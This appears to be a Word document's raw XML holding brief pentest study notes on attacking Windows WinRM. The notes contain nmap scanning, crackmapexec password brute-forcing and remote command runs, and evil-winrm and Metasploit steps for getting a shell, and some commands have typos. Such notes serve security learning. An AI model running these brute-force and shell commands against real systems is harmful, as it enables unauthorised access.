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329F" w14:textId="497D80F7" w:rsidR="00853ABF" w:rsidRDefault="00E8269E">
      <w:r>
        <w:t>Exploiting the WinRM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E33B82" w14:textId="120CF3E8" w:rsidR="00E8269E" w:rsidRDefault="00280F05">
      <w:r>
        <w:t>5985</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12196DD4" w14:textId="6A46F3DF" w:rsidR="00280F05" w:rsidRDefault="00280F05">
      <w:r>
        <w:t>5986 (ssl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E741F36" w14:textId="77777777" w:rsidR="00280F05" w:rsidRDefault="00280F05"/>
    <w:p w14:paraId="0957AF22" w14:textId="03E6595D" w:rsidR="009A4B39" w:rsidRDefault="00EF6F0E">
      <w:r>
        <w:t xml:space="preserve">For exploitation we use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec </w:t>
      </w:r>
      <w:r>
        <w:t>to bruteforce</w:t>
      </w:r>
      <w:r w:rsidR="009A4B39">
        <w:t xml:space="preserve"> as well as run commands</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6712E" w14:textId="69F2F406" w:rsidR="00EF6F0E" w:rsidRDefault="00FC6543">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>For command shell</w:t>
      </w:r>
      <w:r w:rsidR="009A4B39">
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we use </w:t>
      </w:r>
      <w:r w:rsidR="009A4B39">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="009A4B39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evil</w:t>
      </w:r>
      <w:r w:rsidR="009A4B39" w:rsidRPr="009A4B39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-winrm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7CA97" w14:textId="46A3748A" w:rsidR="009A4B39" w:rsidRDefault="009A4B39">
      <w:r>
        <w:t>For meterpreter session use the Metasploit-framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCC5C9" w14:textId="77777777" w:rsidR="009A4B39" w:rsidRDefault="009A4B39"/>
    <w:p w14:paraId="183FAFBC" w14:textId="5814B453" w:rsidR="00981582" w:rsidRPr="00981582" w:rsidRDefault="00981582">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981582">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A597B6" w14:textId="77777777" w:rsidR="00981582" w:rsidRDefault="00981582"/>
    <w:p w14:paraId="4D149C83" w14:textId="3A52409D" w:rsidR="00290E30" w:rsidRDefault="00290E30">
      <w:r>
        <w:t xml:space="preserve">Nmap -s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>V  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>p 5985 5986 target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DECF3B6" w14:textId="77777777" w:rsidR="009A4B39" w:rsidRDefault="009A4B39"/>
    <w:p w14:paraId="54EE8F95" w14:textId="6F93D1BE" w:rsidR="000E3108" w:rsidRDefault="000E3108">
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D1BA4D" w14:textId="474B76BE" w:rsidR="000E3108" w:rsidRDefault="000E3108">
      <w:r>
        <w:t># show help menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544D5061" w14:textId="0FD06888" w:rsidR="000E3108" w:rsidRDefault="000E3108">
      <w:r>
        <w:t>Crackmapexec winrm target_ip -u administrator -p /usr/share/Metasploit-framework/data/wordlists/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF37782" w14:textId="77777777" w:rsidR="000E3108" w:rsidRDefault="000E3108"/>
    <w:p w14:paraId="45A679B2" w14:textId="26D96FE8" w:rsidR="00B25CC0" w:rsidRDefault="00B25CC0">
      <w:r>
        <w:t>Crackmapexec winrm target_ip -u administrator -p Tinkerbell -x “whoami”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6147146E" w14:textId="749C8E18" w:rsidR="00B25CC0" w:rsidRDefault="0085028B">
      <w:r>
        <w:t>Crackmapexec winrm -u administrator - -p Tinkerbell -x “sysinfo”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9EECA" w14:textId="23564A9B" w:rsidR="0085028B" w:rsidRPr="008D1756" w:rsidRDefault="008D1756">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1756">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>command shell session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E84937E" w14:textId="37057DA6" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Evil-winrm.rb  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">u administrator -p ‘tinkerbell’ -i taget_ip  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CA61D3" w14:textId="00570BBC" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>#get command shell session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE84F8" w14:textId="77777777" w:rsidR="008D1756" w:rsidRDefault="008D1756"/>
    <w:p w14:paraId="60BA5852" w14:textId="5ABF01F4" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3A948" w14:textId="5494EDCC" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>Ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8598A5" w14:textId="77777777" w:rsidR="008D1756" w:rsidRDefault="008D1756"/>
    <w:p w14:paraId="1C5E1D54" w14:textId="24C1A4A1" w:rsidR="008D1756" w:rsidRPr="008D1756" w:rsidRDefault="008D1756">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1756">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22912063" w14:textId="689EE307" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507AB510" w14:textId="6357641A" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106E015D" w14:textId="3BC97446" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>Search winrm_script_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6E79F9" w14:textId="02838238" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>Use(num)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B43461" w14:textId="4512C39F" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5DC807" w14:textId="1AC1CF9D" w:rsidR="008D1756" w:rsidRDefault="008D1756">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE64730" w14:textId="592F8D88" w:rsidR="00124D11" w:rsidRDefault="00124D11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10557CB7" wp14:editId="19C67734">
            <wp:extent cx="3448227" cy="850944"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="49123091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30915" name="Picture 1" descr="A screen shot of a computer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D879" w14:textId="6881670F" w:rsidR="008D1756" w:rsidRDefault="00124D11">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8DB42F" w14:textId="77777777" w:rsidR="00124D11" w:rsidRDefault="00124D11"/>
    <w:p w14:paraId="1FEE5A07" w14:textId="77777777" w:rsidR="00124D11" w:rsidRDefault="00124D11"/>
    <w:p w14:paraId="7C09298C" w14:textId="77777777" w:rsidR="0085028B" w:rsidRDefault="0085028B"/>
    <w:p w14:paraId="7E15F141" w14:textId="77777777" w:rsidR="00852169" w:rsidRDefault="00852169"/>
    <w:p w14:paraId="0503217D" w14:textId="77777777" w:rsidR="00852169" w:rsidRDefault="00852169"/>
    <w:p w14:paraId="0B492300" w14:textId="77777777" w:rsidR="000E3108" w:rsidRDefault="000E3108"/>
    <w:p w14:paraId="0A466F34" w14:textId="77777777" w:rsidR="000E3108" w:rsidRDefault="000E3108"/>
    <w:p w14:paraId="615DD3D7" w14:textId="2F6F0CF5" w:rsidR="000E3108" w:rsidRPr="000E3108" w:rsidRDefault="000E3108">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3108">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E8600C" w14:textId="25DBBD90" w:rsidR="000E3108" w:rsidRDefault="000E3108">
      <w:r>
        <w:t>Window system does not have banner that tell the Service version, so it is not exact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB20E3B" w14:textId="77777777" w:rsidR="000E3108" w:rsidRPr="000E3108" w:rsidRDefault="000E3108" w:rsidP="000E3108">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3108">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DE6F9" w14:textId="1FD5ED21" w:rsidR="000E3108" w:rsidRDefault="000E3108">
      <w:r>
        <w:t>It is used a lot during pentest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB93D8" w14:textId="000F06FC" w:rsidR="000E3108" w:rsidRDefault="00B25CC0">
      <w:r>
        <w:t>Winrm is the implementation of wsman.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9880A" w14:textId="77777777" w:rsidR="00EF1BC0" w:rsidRPr="00EF1BC0" w:rsidRDefault="00EF1BC0" w:rsidP="00EF1BC0">
      <w:r w:rsidRPr="00EF1BC0">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1BC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VBS</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1BC0">
        <w:t xml:space="preserve"> = Windows security feature using virtualization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED4A66C" w14:textId="77777777" w:rsidR="00EF1BC0" w:rsidRPr="00EF1BC0" w:rsidRDefault="00EF1BC0" w:rsidP="00EF1BC0">
      <w:r w:rsidRPr="00EF1BC0">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1BC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>force_VBS</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1BC0">
        <w:t xml:space="preserve"> = option that makes sure VBS is always enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E30CCD" w14:textId="4C06EC07" w:rsidR="000E3108" w:rsidRPr="009A4B39" w:rsidRDefault="00EF1BC0">
      <w:r w:rsidRPr="00EF1BC0">
        <w:t>VBS (Virtualization-Based Security)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000E3108" w:rsidRPr="009A4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09"/>
    <w:rsid w:val="000A46DD"/>
    <w:rsid w:val="000E3108"/>
    <w:rsid w:val="00124D11"/>
    <w:rsid w:val="001F3D3F"/>
    <w:rsid w:val="00280F05"/>
    <w:rsid w:val="00290E30"/>
    <w:rsid w:val="003B2E09"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="0085028B"/>
    <w:rsid w:val="00852169"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008B1DA1"/>
    <w:rsid w:val="008D1756"/>
    <w:rsid w:val="00981582"/>
    <w:rsid w:val="009A4B39"/>
    <w:rsid w:val="00B25CC0"/>
    <w:rsid w:val="00E8269E"/>
    <w:rsid w:val="00EF1BC0"/>
    <w:rsid w:val="00EF6F0E"/>
    <w:rsid w:val="00F27872"/>
    <w:rsid w:val="00FC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D462"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8551424D-3D0E-4791-B359-8BB5C958F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25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-27T18:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-27T19:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>